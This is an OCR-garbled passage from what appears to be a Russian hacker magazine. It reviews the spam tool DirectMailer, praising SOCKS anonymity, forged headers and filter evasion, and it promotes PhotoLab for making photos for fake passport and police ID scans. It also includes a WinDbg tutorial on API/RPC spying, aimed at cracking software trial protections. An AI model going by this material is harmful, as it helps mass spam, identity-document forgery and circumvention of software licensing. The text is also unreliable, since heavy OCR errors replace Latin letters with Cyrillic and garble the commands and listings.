настройками/конфигами. Тулза прекрасно 
работаете соксами, что позволяет существенно 
увеличить процент писем, идущих в инбокс :]. 
Также имеется лог-отчет, с помощью которого 
удобно следитьза ходом рассылки. Крометого, 
в конфигах можно прописать необходимые 
темы писем, то есть все письма будут рассы- 
латься не под однойтемой, а под теми, которые 
ты укажешь. Аналогичная схема реализована 
и для поля Ргот, то есть для поля отправителя 
письма. Этот фа кт, несомненно, усложняет 
работу спам-фильтрам на почтовых серверах, 
заставляя их ошибаться снова и снова =). Корот- 
ко приведу основные возможности ОігесіМаіІег: 
• возможность работы через ЭОСКЭ-прокси 
(обеспечивает полную анонимность отправителя); 



• автоматическая подстановка заголовков 
Ресеіѵеб при анонимной отправке с учетом РТР 
используемого прокси; 

• грамотная работа со всеми известными фор- 
матами записи е-таіі-адресов, парсер адреса и 
имени отправителя/получателя; автоматичес- 
кое извлечение из адреса имени (содержимого 
до«(Э») в случае его отсутствия; 

• многопроцессная отправка (высокая произ- 
водительность программы); 

• многополосная система обхода спам- 
фильтров (детальная рандомизация путем 
поддержки специальныхтегов, подстановка 
случайныхстрокиззаданных файлов в неогра- 
ниченном количестве, замена на лету кирилли- 
цы на латиницу (транслитерация)); 

• поддержка всех включенныхтегов в теме 
письма; 

• подстановка тем письма выполняется из 
файла; 

• поля Ргот, Реріу-То подставляются из файла; 

• полное задание стиля оформления письма со 
всеми особенностями почтовых клиентов 

ТЬе Ваі, Оиііоок Ехргезз; 

• возможность задать случайный выбор уровня 
важности и стиля оформления письма; 

• уникальная генерация письма для каждого 
отдельного получателя (персональная копия); 

• возможность отправки индивидуального 
письма для каждого получателя в условиях 
массовой рассылки; 

• формат писем Техі и НТМІ_; 

• возможность отправки писем с аттачментами; 

• подробный файл отчета о проделанной 
работе; 

• интуитивно понятный интерфейс. 

Крометого, программа умеет чекать базы мыл 
на валидность и определять степень валиднос- 
ти базы после рассылки. Собственно, все харак- 
теристики тулзы описать попросту невозможно, 
поэтому настоятельно рекомендую попробовать 
заюзать ОігесіМаіІег в боевыхусловиях. Единс- 
твенный существенный недостато кутилы — она 
может работать не на всех хости нгах. Поэтому 
лучше всего залить ОігесіМаіІег на свой дедик, 
регулярнообновлятьсписоксоксов и не 
париться =). 

ПРОГРАММА: РНОТОІ_АВ 
ОС: ѴІІЧ00Ѵ8 2000/ХР 
АВТОР: И. ПОНОМАРЕНКО 

В моей статье, посвященной антифроду, ты мог 
прочитать, помимо всего прочего, еще и о под- 
делке сканов документов (паспортов, кредитных 
карт и т.д.). Только тогда я писал с точки зрения 
защиты, а сейчас мы перейдем в наступление =). 
Дело в том, что грамотно сделанные сканы 



> Делаем фотку на доки 



доков всегда пользовались спросом. В Сети 
ты при желании даже можешь найти сервисы, 
выполняющиетакую работу. Зачем и кому нуж- 
ны сканы паспортов, водительских прав и про- 
чих документов, я сейчас объяснять не буду. 
Однако я хочу представить софтину, которая еще 
не раз выручиттебя при изготовлении сканов 
— РЬоЫаЬ. Тулза рассчитана, прежде всего, 
на редактирование фотографий, но ты запросто 
можешь юзать ее в более «боевых» условиях. 
Например, при изготовлении фотки на левый 
скан паспорта :). 

В общем, прога предназначена для автома- 
тизации процесса подготовки фотографий на 
различные доки. Причем фотку можно замутить 
строго заданного формата на любой документ 
(например, водительское удостоверение, 
паспорт, заграничный паспорт, всевозможные 
удостоверения и т.д.). Крометого, тулза имеет 
более 20 стандартных форматов: паспорт, 
заграничный паспорт, пенсионноеудостове- 
рение, пропуск, вид на жительство, личное 
дело, сотрудник МВД и другие =). Скорее 
всего, пенсионноеудостоверениетебя вряд 
ли заинтересует, но вот паспорт или милицей- 
ская ксива — вполне :). Утила обладает рядом 
возможностей: 

• подготовка фотографий различных форматов; 

• коррекция фотографий; 

• преобразование цветной фотографии в 
черно-белую; 

• наложение «уголков» разныхтипов (прямой, 
круглый, круглый с ретушью); 

• изменение резкости, яркости, контрастности, 
гаммы; 

• изменение цветогого баланса (отдельно 
в тенях, полутонах и бликах); 

• интеграция с графическими редакторами 
(например, с АбоЬе РЬоіозЬор). 

Напоследок скажу, что сам успешно использую 
софтинку уже не первый месяц и полностью 
доволен. Тулза, действительно, сочетает в себе 
все необходимое для редактирование фоток пуд 
различные нужды =).ЗЕ 
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КРИС КАСПЕРСКИ 




ПОСЛЕ 50РТ-ІСЕ 



ОТЛАДЧИК У/ШйВО КАК АРІ- И КРС-ШПИОН 



Ранние версии ѴѴіпБЬ^'а от МісгозоІТ не пользовались у хакеров большой популярнос- 
тью и все дружно налегали на ЗоІТ-Ісе, но теперь, когда поддержка последнего пре- 
кращена и он обречен на медленное, но неотвратимое умирание, возникает вопрос: 
как дальше жить и чем ломать? Тем временем ѴѴіпЦЪ§ сильно повзрослел, и хотя он 
и отстой, но по целому ряду характеристик он обгоняет 5оЛ-1се. Сейчас я покажу, как 
использовать ѴѴіпБЬ^ в качестве АРІ- и КРС-шпиона. 



РІ-и РРС-шпионы входятв актив- 
ный инструментарий хакера. 

Эти орудия борьбы должны быть 
всегда остро заточены и готовы 
к десантированию в тыл врага для сбора ин- 
формации о вызываемых функциях. Зная, какие 
функции (и с какими аргументами) вызываетза- 
щита, мы можем ставитьточки останова, всплы- 
вая отладчиком в непосредственной близости от 
штаб-квартиры врага. Еслиже этой информации 
у нас нет, точки останова приходится ставить 
вслепую, гадая, какой именно АРІ-функцией 
воспользовалась программа. В частности, одних 
только функций для чтения текущей даты (не- 
обходимой защите для определения периода ис- 
течения триала) существуете полдесятка, и без 

/094 



шпиона нет никакой возможности угадать, какой 
именно из них воспользовался разработчик. 
Тоже самое относится и к РРС-вызовам 
(Реплоіе Ргосебиге Саіів), своеобразному 
фундаменту множества служб, к числу которых 
принадлежит Служба печати, да и, естественно, 
нетолько она одна. 

В общем, без шпионов ломать становится совсем 
хреново. Но БоІЫсе не предоставляеттаких воз- 
можностей, и приходится использовать сторон- 
ние средства, большинство из которых способны 
шпионить только за честными программами. 
Ктомуже неудобно каждый раз выходить из 
отладчика, чтобы запустить очередную утилу. 
Намного комфортнее держать весьхакерский ар- 
сенал в одном месте. И этим местом постепенно 



становится М іеговой ѴѴІп б оѵѵз ОеЬиддег, подде- 
рживающий множество полезных расширений 
на все случаи жизни и, естественно, позволяю- 
щий писать нужные нам расширения самостоя- 
тельно. 

Преодолевая стойкое предубеждение перед 
продукцией Місгозо^, всеже скачаем этогозверя 
и посмотрим, на что он способен. 

□ Первое знакомство с ѴѴіпйЬд 

ОтладчикѴѴІпОЬд представлен в двух«ипоста- 
сях». І386кб.ехе (для 64-битной версии — Іа64кб.ехе) 
— консольный кегпеі-бебиддег, отлаживающий 
только драйверы вместе с дампами памяти ядра 
и требующий как минимум двух машин, связан- 
ныхеот-шнурком или взаимодействующих 
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> Графическая версия ядерного/прикладного отладчика 
отМісгозоК 




> Бесплатная раздача БеЬиддіпд Тооіз с сайта МісгозоК 



через сеть. Если двух машин нет, можно 
воспользоваться ѴМѴѴаге, поддерживающим 
виртуальные сетевые адаптеры и позволяющим 
загонять сот-порт (виртуальный, естественно) 
в пайп. Несмотря нато что І386кс1.ехе — довольно 
мощная и хорошая штука (подробно описанная 
у Шрайбера в его «Недокументированных воз- 
можностях ѴѴІпбоѵѵз 2000»), для наших хакерских 
целей она не потребуется. 

ѴѴІпОЬд.ехе пред ста вляетсобойтипичное 0 111- 
приложение, довольствующееся одним компью- 
тером и позволяющее отлаживать прикладные 
программы, анализироватьдампы памяти, шпи- 
онить за событиями, происходящими в системе. 

А вот для отладки драйверов опять-таки понадо- 
бится второй компьютер, соединенный сетью или 
шнурком, но мы обойдемся и без шнурка. 

Много полезной информации содержится в 
справочном файле ІеЬиддег.сЬт, который 
полезно прочитать до запуска отладчика, чтобы 
незадавать на форумах глупых вопросов и не ло- 
миться в открытые двери. Возможности ѴѴІпОЬд 
намного шире, чем это кажется на первый взгляд, 
просто до них через меню и прочие интерфейс- 
ные штучки не добраться! 

ОК, начинаем рыть в глубь. В каталогах \л/2ксЬк 
и ѵѵ2к^ге валяются модули расширения для 
ѴѴіпсІоѵѵз 2000, конструктивно выполненные 
в виде динамических библиотек. Содержание 
обоих каталогов идентично, и разница между 
ними заключается в том, что *сНк работает 
с отладочной версией ядра (сбескіпд Ьиіісі), а *^ге 
— с финальной (геіеазе). 

Посмотрим, чтоу насздесь находится: 

МОДУЛИ РАСШИРЕНИЯ ДЛЯ ѴѴШ0В6 Р 
ПРЕДНАЗНАЧЕННЫЕ ДЛЯ ѴѴШйОѴѴБ 2000 

Содержимое папки С:\Ргодгаш Рі1ез\ 
БеЬиддіпд Тооіз Тог Міп6оѵ\/з\ѵ\/2кТге 
<БІК> 

<БІК> 

105 499 асрікб.611 

179 227 дсііксіх . (111 



302 620 


изегкбх . 111 


<БІК> 




106 524 


ѵбтехТз . 111 


<БІК> 




11 файлов 


3 845 428 байт 


612 864 


ехТ . 611 


2 папок 


995 536 896 байт 


174 592 


кехТ . 111 


свободно 




228 864 


ІодехТз . 611 






<БІК> 


тапіТезТ 


Назначение большинства модулей можно 


53 760 


иехТ . 611 


определить по их названию или, на худой конец, 


22 528 


жЗТкб.611 


загрузить непонятный модуль в отладчик 


5 файлов 1 


092 608 байт 


и вызыватьегохелп. 


Чуть позже мы покажем, 


3 папок 995 


524 608 байт с 



какэто делается, а пока заглянем в каталог 
ѵѵіпхр, хранящий расширения, специфичные 
для ѴѴІпбоѵѵз ХР: 

МОДУЛИ РАСШИРЕНИЯ ДЛЯ ѴѴМОВбр 
ПРЕДНАЗНАЧЕННЫЕ ДЛЯ ѴѴШ00ѴѴ5ХР 

Содержимое папки С:\Ргодгаш Рі1ез\ 
БеЬиддіпд Тооіз Тог ШпбомзЛтпхр 



Файл с ничего не говорящим именем ІодехІз.сІІІ 
— это и есть шпионский компонент (ну, для 
шпионов маскироваться — вполне нормально 
и ничего удивительного тутнет). 

Теперь что касается самого ѴѴІпОеЬ. Раскладку 
окон, цвет и гарнитуру шрифтов каждый может 
настроить под свой вкус, поскольку в конфи- 



<БІК> 




гурации поумолчанию с отладчиком долго рабо- 


<БІК> 




тать невозможно, иначе глаза опустятся куда-то 


73 728 


асрікб. 611 


в район хвоста, а для хакеров глаза — второй 


4 841 


беТаиІТ . ТтТ 


инструмент после серого мозгового вещества! 


285 696 


ехТз . 611 


Так что первое, что нужно сделать с ѴѴІпОеЬ, 


1 096 192 


кбехкз . 611 


— это настроить его под свой собственный вкус 


66 048 


тіпіркб. 611 


(а вкусы, как известно, у всех разные). 


50 176 


ѵлпікгасе . 611 




77 312 


ѵ\гоѵ\/64ехкз . 611 


©Техника АРІ-шпионажа 


17 файлов 2 


653 50 0 байт 


В состав Ріабогт 50К изначально входило 


2 папок 995 


532 800 байт свободно 


какое-то подобие АРІ-шпиона (точнее, пародия 



Ка к видно, набор расширений для ХР намно- 
го богаче, но я все равно не изменю своей 
любимой ѴѴІпбоѵѵз 2000, под которой сидел, 
сижу и буду сидеть, а когда же она окончательно 
одряхлеет, мигрирую на РгееВЗй, тем более что 
расширения, ответственные за шпионов, хра- 
нятся в каталоге ѵѵіпехі, общем для всех систем. 

МОДУЛИ РАСШИРЕНИЯ ДЛЯ ѴѴШОВѲ, 
ПРЕДНАЗНАЧЕННЫЕ ДЛЯ ОСЕЙ ВСЕХ 
ТИПОВ 

Содержимое папки С:\Ргодгаш Рі1ез\ 
БеЬиддіпд Тооіз Тог Шіп6оѵ\/з\ѵ\/іпехТ 



на АРІ-шпиона), расположенное в \МісгозоЙ 
РІаНогт 50К\Віп\\А/іпМТ\Арітоп.ехе, однако оно 
выдавалотолько общую статистку по АРІ-вызовам 
без учета иххронологии и постоянно падало при 
попытке загрузить в него что-то более сложное, 
чем поіераб. Короче, для взлома Арітоп.ехе не 
годился. Однозначно! 

Посмотрим на ѴѴІпсІЬд, что же в нем изменилось? 
Забегая вперед, скажем: абсолютно все! МісгозоИ 
предоставила нам сложный и могущественный 
инструмент, способный решать широкий круг за- 
дач и противостоять различным антиотладочным 
приемам, которыми понапичканы современные 
защитные механизмами. 
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> Загрузка расширения грсехіз, ответственного за РРС-шпионаж * Определение подлинной точки входа с помощью Ніеѵѵ а 
(и не только шпионаж!), и выдача справки по нему 



Короче, будем считать, что я тебя соблазнил. 
Приступаем к экспериментам. Первым делом 
загружаем в отладчик файл, за которым мы будем 
шпионить, например всетотже блокнот. Делается 
это так: «Рііе Ореп ехесиіаЫе поіерасі.ехе». 
Илитак: нажимаем <СТПЕ-Е>, вбиваем «поіерасі.ехе». 

В крайнем случае, файл можно за грузить из 
командной строки. Только не нажимай раскрыва- 
ющуюся папку на панели инструментов — это все 
равно не поможет, так как она предназначена для 
работы с исходными текстами и их окружением, 
которых в нашем распоряжении, естественно, нет. 

НЕВЕРНОЕ ОПРЕДЕЛЕНИЕ ТОЧКИ ВХОДА 
ПРИ ЗАГРУЗКЕ ИСПОЛНЯЕМОГО ФАЙЛА 
ВѴѴШ0В6 

СотшашЗЫпе : С : \ЖШТ\Ж)ТЕРАБ . ЕХЕ 
ЗутЬоІ зеагсЪ раіЪ із: *** Іпѵаіісі 
* * * 

ЕхесиіаЫе зеагсЪ раіЪ із: 

МосІБоасІ : 01000000 01010000 
поіерасі. ехе 

МосНюасі : 77180000 7711(1000 пісііі. 
(111 

Мо(1Ьоа(1: 7бае0000 76Ые000 С:\ 

ЖБЫТ\зуз1ет32 \сотс!1д32 . (111 
МойЬоай: 772с0000 77326000 С:\ 

ЖШТ\зуз1ет32\8НШАРІ .БЬЬ 
МобЬоай: 79060000 790с5000 С:\ 

ЖШТ\зузЪет32\АБѴАРІ32 .(111 
МойЬоай: 71710000 71794000 С:\ 

ЖШТ\зуз1ет32\СОМСТЪ32 .ВЪЪ 
МосНюасі: 7се80000 7(10с6000 С : \ 
ЖШТ\зуз1ет32\ЗНЕЬЬ32 . БББ 
МосНюасі: 777(10000 777ее000 С:\ 

ЖШТ \ зу з 1 ешЗ 2 \ Ж№ РООБ . БКѴ 
МоЫоаЫ 79500000 79511000 С:\ 

ЖШТ\зуз1ет32\МРК.ВЕЪ 
(510.508) : Вгеак іпзігисііоп 
ехсерііоп — сосіе 80000003 (Іігзі 
сЪапсе) 

еах=0 00000 00 еЬх=00071104 
есх=0 00000 09 е(1х=0000 0000 
езі=7 11(11000 ес!і = 0007117 0 
еір=7719193с езр=00061984 



еЬр=00061с98 іор1=0 пѵ ир еі 

рі п 2 па ре пс 
сз = 001Ь зз = 0023 (1з = 0023 
ез=0023 1з=003Ь дз=0000 
е!1=00000202 

*** ервСЖ: ЗутЬоІ Іііе соиЫ поі Ье 
Іоипй. Беіаиііесі Іо ехрогі зутЬоІз 
Іог пісііі . (111 - 
п!(111 ! БЬдВгеакРоіпІ : 

7719193с іпі 3 

Отладчик послушнозагружаетфайл, отобра- 
жая все динамические библиотеки, пере- 
численные в таблице импорта, показывает 
содержимое регистров и уста на вливает точку 
останова в ЕпігуРоіпі. На самом деле, это мы 
думаем, что отладчикустанавливаетточку 
останова в ЕпігуРоіпі, а в действительности 
все обстоит не так! Судя поадресу77Е9193СН, 
лежащему глубоко внутри N1011. 0 ЕЕ, это не 
совсем ЕпігуРоіпі, точнее, совсем не ЕпігуРоіпі, 
а паііѵе-АРІ-функция ОЬдВгеакРоіпі, которую 
можнотрассироватьдо конца света, нотак ни 
к чему и не прийти. Приходится выкручиваться 
и применять всякие недетские извращения 
(впрочем, для хакеров они вполне типичны). 
Загружаем поіерасі.ехе в наш любимый Иіеѵѵ.ехе 
(или любой другой Ьех-редактор), жмем на 
<ЕЫТЕР> для перехода в Ьех-режим, давим 
<Е8> для отображения заголовка и переходим 
по <Е5> в истинную точку входа , адрес которой 
(в моем случае равный 1 006420И) высвечивает- 
ся в левом верхнем углу экрана. 

Возвращаемся в ѴѴіпйЬд и, находясь в окне 
команд (такая строчка с деловито мерцающим 
курсором), пишем «ВР 1 006420», устанавливая 
точку останова, после чего жмем <Е5> (или даем 
команду д — в смысле «доіо», продолжение вы- 
полнения) и ждем развития событий. А события 
ждать себя не заставляют: 

РУЧНАЯ УСТАНОВКА БРЯКА НА ИСТИННУЮ 
ТОЧКУ ВХОДА 

0: 000> ВР 1006420 
0 : 000> д 



МосНюасі: 75е00000 75е1а000 С:\ 

ЖШТ\зуз1ет32\ІММ32 . БББ 

МоЫюаЫ 10000000 10005000 С:\ 

ЖШТ\зуз1ет32 Хшпііюіііх . (111 

Вгеакроіпі 0 кіі 

еах=0 000000 0 еЬх=711(11000 

есх=00010101 ес1х= 11111 111 

езі = 0009а010 е<іі = 017а1640 

еір=01006420 езр=000611с4 

еЬр=00061110 іор1=0 пѵ ир еі 

рі 2 г па ро пс 

сз = 001Ь зз = 0023 (1з = 0023 

ез=0023 1з=0038 дз=0000 

е!1=00000246 

по!ера(1+0х642 0 : 

01006420 ризЪ. еЬр 

Отладчик подгружает еще две динамические 
библиотеки (одна из которых — ѵѵтіНоіііх.сіи, 
заплатка от Ильфака), радостно сообщает, что 
«Вгеакроіпі 0 Ыі» (сработала точка останова), 
выводитзначения регистров (ну куда же без них) 
и первую машинную команду, стоящую в точке 
входа, — ривЬ еЬр. 

Команда и позволитдизассемблировать 
остальные команды, следующиеза ней, помогая 
убедиться, что мы действительно находимся 
там, где нужно: 

ДИЗАССЕМБЛИРОВАНИЕ ОКРЕСТНОСТЕЙ 
ТОЧКИ ВХОДА 

0 : 000> и 
по!ерас1+0х642 0 : 



01006420 


ризЪ. 


еЪр 


01006421 


шоѵ 


еЪр, езр 


01006423 


ризЪ. 


0x11 


01006425 


ризЪ 


0x1001888 


0100642а 


ризЪ 


0x10065(10 


01006421 


шоѵ 


еах, Із : [ 0 ] 


01006435 


ризЪ 


еах 


01006436 


шоѵ 


Із : [ 0 ] , езр 



Теперь, когда все подготовительные мероп- 
риятия завершены, необходимо подключить 
модуль расширения. Для этого даем команду 
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> Крах АріМоп'а при попытке скормить ему РАП, упакованный 
АЗРаск'ом 
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<21 ВІ -I «I ! ІЙІЗ.І ±Ы іЯІКІ-іМ <ЗІ 
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> Отчет АріМоп'а о количестве вызовов АРІ-функций, совершен- 
ных подопытной программой 



ІІоасІ <пагше>, где пате — имя модуля рас- 
ширения без .611 (в данном случае — ІодехТз) . 
Полностью вся команда выглядиттак: 

0:000> ! ІоасЗ ІодехБз 

Отладчик проглатывает ее какни в чем небывало, 
и создается впечатление, что ничего не проис- 
ходит. Но это нетак! Чтобы убедиться, что модуль 
расширенияуспешноза гружен, вызовем его 
локальную справку, набрав команду ЗодехЫНеІр. 
Мы видим, сколько тут всего, хорошего и разного! 

С одного захода это даже не разгрызть, но мы все- 
таки попробуем. Команда Ноде [біг] активирует 
шпионаж за АРІ-функциями, прижелании позво- 
ляя указать каталог, в котором будетавтоматичес- 
ки создана поддиректория ЬодЕхЩ для хранения 
логов. Логи могут писаться как в текстовом, там 
и в двоичном формате (формат вывода задается 
командой Подо), причем имя лога соответству- 
ет имени исполняемого файла, за которым он 
шпионил (например, поТЕРАО.ЕХЕ.Ш — да-да, вот 
именно в таком регистре он и записывается). 
Вызванная без параметров команда Подо выво- 
диттекущий форматлога. Чтобы включитьтек- 
стовый формат, необходимо набрать «Подо е і», 
а чтобы включить все 3 параметра, необходимо 
трижды вызвать Подо с разными ключами. 

К сожалению, конструкцию «Подо е сііѵ» отлад- 
чик не переваривает. Редиска! 

Для сокращения размеров лога и выки- 
дывания заведомо ненужной информации 
ѴѴІпОЬд поддерживает категории АРІ-вызо- 
вов, список которых можно вывести на экран 
командой !1одс: 



ПРОСМОТР КАТЕГОРИЙ АРІ-ФУНКЦИЙ 

О : 000> 1 Іодс 
СаБедогіез : 

1 АсіѵАрі32 ЕпаЫесЗ 

2 АБотРипсЫопз ЕпаЫесЗ 

3 АѴІЕіІеЕхрогБз ЕпаЫесЗ 

4 СІірЪоагсІ ЕпаЫесЗ 

5 СошропепбОЬ д есШосЗеІ ЕпаЫесЗ 

6 БеЬиддіпдАпсЗЕггогНапсЗІіпд 

ЕпаЫесЗ 

7 БеѵісеЕипсБіопз ЕпаЫесЗ 

8 БігесБЗБ ЕпаЫесЗ 

9 БігесББгаѵ\/ ЕпаЫесЗ 



2 5 Бзег328БгіпдЕхрогБз ЕпаЫесЗ 
2 6 Ѵегзіоп ЕпаЫесЗ 

2 7 У7іп5оск2 ЕпаЫесЗ 



Как видно, всего имеется 27 категорий, и для 
просмотра функций, входящих в каждую из 
категорий, можно воспользоваться командой 
! Іодіс р #, где # — номер категории, например 16 
— МетогуМападетепіЕипсбопв. 

ПРОСМОТР ИМЕН АРІ-ФУНКЦИЙ, ВХОДЯ- 
ЩИХ В КАТЕГОРИЮ МЕМОРѴМАМАбЕМЕІЧ 
ТРШЧСТІ0ІЧ5 

О : 000> ’ Іодс р 16 
МетогуМападетепБЕипсЫопз : 
АІІосаБеБзегРЬузісаІРадез 
КЕКБЕБ32 .БЕЕ 
ЕгееБзегРЬузісаІРадез 
КЕКБЕЕ32 .БЕЕ 
СеЕРгосеззНеар 
КЕІЫЕЕ32 . БЬБ 



СеЕРгосеззНеарз 
КЕШЕЕ32 . ББЬ 

ОрепЕ і 1 еМарр іпдА 
КЕШЕЕ32 .ББЬ 
ОрепЕ і 1 еМарр іпдУ7 
КЕШЕЕ32 .БЬБ 
БптарѴ і еѵ\Ю Е Р і 1 е 
КЕШЕЕ32 . БББ 

Для шпионажа за определенными категориями 
функций даем команду ! Іодс е # # #, где е — 
включить (епаЫе) шпионаж, а # — перечень 
категорий. Ключ ‘сГ (сПваЫе), соответственно, 
означает исключить данную категорию (катего- 
рии) АРІ-функций из круга подозреваемый и не 
шпионить за ними. Команда ! Іодс е * включает 
все категории (и это основной режим шпиона, 
в котором гоняютего хакеры при первом зна- 
комстве с ломаемой программой). 

При желании можно указать перечень динами- 
ческих библиотек, за которыми следует/не сле- 
дует следить. Зачастую это намного проще, чем 
возиться с категориями. Отображением списка 
текущих поднадзорных библиотекзанимается 
команда Подгп: 

ПРОСМОТР СПИСКАДИНАМИЧЕСКИХБИБ- 
ЛИОТЕК, ЗА КОТОРЫМИ ОСУЩЕСТВЛЯЕТ- 
СЯ ШПИОНАЖ 

О : 0 0 0 > ! Іодш 
ІпсІисЗесЗ шосЗиіез : 

Б8ЕК32 .БББ 
СБІ32 .БББ 
АБѴАРІ32 .БББ 




Місго5обі:\Ѵіпсіоѵѵ5ВеЬи§§ег (далее по тексту просто ѴѴтБеЪ) входит в состав множества продуктов: РІаНогт 5БК, БЭК, ѴѴПР, а также 
поставляется вместе с самостоятельным пакетом «ПеЪи§§іп§ Тооіз бог ѴѴіпсІоѵѵз», занимающим чуть больше 15 Мб. Причем версия 
ѴѴтПеЪ из комплекта «ПеЪи§§іп§ Тооіз бог ѴѴІпсІоѵѵз» обычно самая свежая и содержит наибольшее количество всяких полезных рас- 
ширений. Скачать ее можно с ѵѵѵѵѵѵ.тісгозобЕсот/ѵѵМс/беѵШоІз/беЪи^іп^ (32-битная и 64-битная версии). Місгозобі: устроила бес- 
платную раздачу, не требуя даже проверки подлинности копии ѴѴтсІоѵѵз. По крайней мере, пока. В любом случае, этот пакет валяется 
на многих сайтах, но далеко не всегда первой свежести. 
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Просматривая этотсписок, мы с удивлением 
обнаруживаем в нем отсутствие КЕРЫЕ1_32.0І_Е 
— базовой ядерной библиотеки, содержа- 
щей максимум интересующих нас функций. 
Попытка включить ее в список командой 
!1одт і КЕРЫЕЕ32.0ЕЕприводитк появлению 
многоэтажного матерного ругательства: мол, 
КЕРМЕЕ32.0ЕЕобязательно должна быть исклю- 
чена и включению не подлежит: 

КАТЕГОРИЧЕСКИЙ ОТКАЗ ОТЛАДЧИКА 
ШПИОНИТЬЗАКЕКМЕІ_32.0І_І_ 

0 : 0 0 0 > ! Іодш і КЕШЕБ32.БББ 
КЕКБЕБ32 . БББ із тапсІаБогу Бог 
ехсіизіоп зо ІБ сап' Б Ье іпсіисіесі. 
Іпсіисіесі тосіиіез : 

На самом деле, стоиттолько нажать <Е5>, как 
в логе (параллельно выводимом на экран 
и в файл) появятся перехваченные имена АРІ - 
функций, принадлежащих КЕРЫЕЕ32.0ЕЕ: 

ФРАГМЕНТ ШПИОНСКОГО ПРОТОКОЛА, 
СОДЕРЖАЩЕГО ВСЮ НУЖНУЮ НАМ ИНФУ 

ТЬгсІ 4с4 010029ВБ СеБРгосАскЗгезз ( 
ШББ "ЕедізБегРепАрр" ) -> ШЬБ 
[РАІІЛ 

ТЬгй 4с4 77Е202Е2 
ЬоасЗЫЪгагуЕхМ ( " ШБІСБЬЬ . 

(411" ШБЬ АБТЕРЕБ_ЗЕСН_РАТН) -> 
ОхбЕЗ 80000 

ТЬгсІ 4с4 77106СЕ2 СеБРгосАскЗгезз ( 

0x7 7Е8 0 ООО "ЫБОиегуЗу зБешІпБогшаБ 

іоп" ) -> 0х77Е889БС 

ТЬгсІ 4с4 77106Б0Б СеБРгосАскігезз ( 

0х77Е80000 "ББОрепЕіІе " ) -> 

0х77Е886АС 

Тіігсі 4с4 77106Б1А СеБРгосАскігезз ( 
0х77Е80000 "ЕБИпБББпБсойеЗБгБпд" ) 
-> 0х77ЕАВЕ9С 
ТЬгсі 4с4 77Е202Е2 

ЬоайЫЬгагуЕхТАГ ( " РБЗНЕББ . БББ " ШЬБ 
АБТЕКЕБ_8КСН_РАТН) -> ОхООЕЗОООО 
ТЬгй 4с4 77Е202Е2 
ЬоайЫЬгагуЕхШ ( " ЗЗЗепзог . 

(411" ШБЬ АБТЕВЕБ_ЗВСН_РАТН ) -> 
ОхОІЗВОООО 

ТЬгсІ 4с4 7 6АЕ1ВАВ СеБРгосАскігезз | 

0x79430000 "СеББзегБеБаиІБІЛЬапди 

аде") -> 0x7947106В 

Тіігсі 4с4 7СЕААЕЗ 9 СеБРгосАскігезз ( 

0х77Е10000 "СеБЗузБешМеБгісз " ) -> 

0х77Е33277 

ТЬгсі 4с4 7СЕААЕ4А СеБРгосАскігезз ( 
0х77Е10000 "МопіБогРготІлІіпсіоѵг" ) -> 
0х77Е2 92 0В 

Тіігсі 4с4 7СЕААЕ5В СеБРгосАскігезз ( 



0х77Е10000 "МопіБогЕгошКесБ " ) -> 
0х77Е2 0Б54 

ТЬгсЗ 4с4 7СЕААЕ6С СеБРгосАскігезз ( 
0х77Е10000 "МопіБогЕгошРоіпБ " ) -> 
0х77Е2А0Е2 

ТЬгсІ 4с4 7СЕААЕ7Б СеБРгосАскігезз ( 
0х77Е10000 "ЕпишБізрІауМопіБогз " ) 
-> 0х77ЕІЕб1Б 

ТБгсЗ 4с4 7СЕААЕ8Е СеБРгосАсМгезз ( 
0х77Е10000 "ЕпишБізрІауБеѵісезІлІ" ) 
-> 0х77Е18А08 

ТЬгсІ 4с4 7 СЕААЕАЕ СеБРгосАскігезз ( 
0х77Е10000 "СеБМопіБогІпБоШ" ) -> 
0х77Е2А07Е 

В наше распоряжение попадают номера 
потоков (ібгб), адреса вызова АРІ-функ- 
ций вместе с передаваемыми ими аргу- 
ментами. По приведенному выше фраг- 
ментулога видно, что, вызвав функцию 
беіРгосАббгезБІМІЛЕ «РедізІегРепАрр») по 
адресу 01 0029В й Ь , блокнот погрузился в пу- 
чину системных библиотек, лежащих далеко 
за пределами принадлежащей ему области 
адресов. Но это не главное. Главное то, что 
шпион от МІСГ030І4 работает и успешно 



шпионит, практически ни в чем неуступая 
большинству своих конкурентов, а кое в чем 
их даже и обгоняя! 

□ Техника ПРС-шпионажа 

РРС-шпионажосуществляется во всем анало- 
гично АРІ-шпионажу (ну, практически аналогич- 
но), только вместо Іодехіз используется расшире- 
ние грсехіз, загружаемое командой ІІоасІ грсехк 
и выдающее справку по своим ключам командой 
Ігрсехіз.беір. 

Ключиже настолько обширны, что требуют для 
своего описания целой статьи. Но в большинстве 
случаев встроенного хелпа вполне достаточно! 

□ Заключение 

Мы рассмотрели всего лишь 2 расширения 
отладчика ѴѴІпОЬд из очень многих! Ну, так 
чего же мы сидим? Чего ждем?! Загружаем 
все расширения одно за другим, даем команду 
Іпате.ЬеІр, смотрим, курим, читаем, втыкаем, 
после чего экспериментируем, постигая все 
новые границы и мысленно сравнивая воз- 
можности ѴѴІпОЬд и Зо^-Ісе. Но, несмотря ни 
на что, Зо^-Ісе все-таки жалко. Хороший был 
отладчик... ИИ 
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Победитель нового конкурса 
вырвет из наших рук крутой 
монитор ѴіеѵѵЗопіс ѴХ922 со 
временем отклика 2 см. Спеши 
20 февраля на кэгшті. хакер. ги 
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Вот и наступил новый 
2007 год. И, надеюсь, пре- 
дыдущий прошел для тебя 
только с пользой, новы- 
ми знаниями и яркими 
впечатлениями. Дух 
Рождества еще кружится 
в твоей голове, а студен- 
там-хакерам нужно сдавать 
экзамены, иначе из них по- 
лучатся солдаты-хакеры :). 
Но хакер Вася завалил 3 эк- 
замена подряд, и ему необ- 
ходима помощь. Никто, кро- 
ме тебя, не может ему 
помочь, а ведь за его 
свободутебе предлагают 
неплохую прибавку к стипен- 
дии. Взломай базу корруп- 
ционера Иванова, иначе 
Васе придется драить толчки 
каждый вечер после отбоя на 
протяжении следующих двух 
лет, а тебе — жить 
на жалкую студенческую 
стипендию. 

Лидерами новогоднего кон- 
курса стали сразу 5 человек: 
Огеаі, 5ѴѴІ5Н, ѴОБНагк, дгагу 
и Ю0А4. 

Но почтовый ТРТ-монитор 
получит самый первый, на 
несколько минут обогнавший 
соперников хакер под ником 
Сгеаі. Он первым преодолел 
все препятствия, с чем мы 
его и поздравляем :). ПС 
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РАЗГОВОР С РОССИЙСКИМИ РАЗРАБОТЧИКАМИ РРЕЕВЗй 



Возможно, РгееВЗБ установлена на твоем домашнем компе. Или ты держишь ее только 
на сервере. Или на удаленном шелле. Этого я не знаю, но в том, что ты хоть раз в жизни 
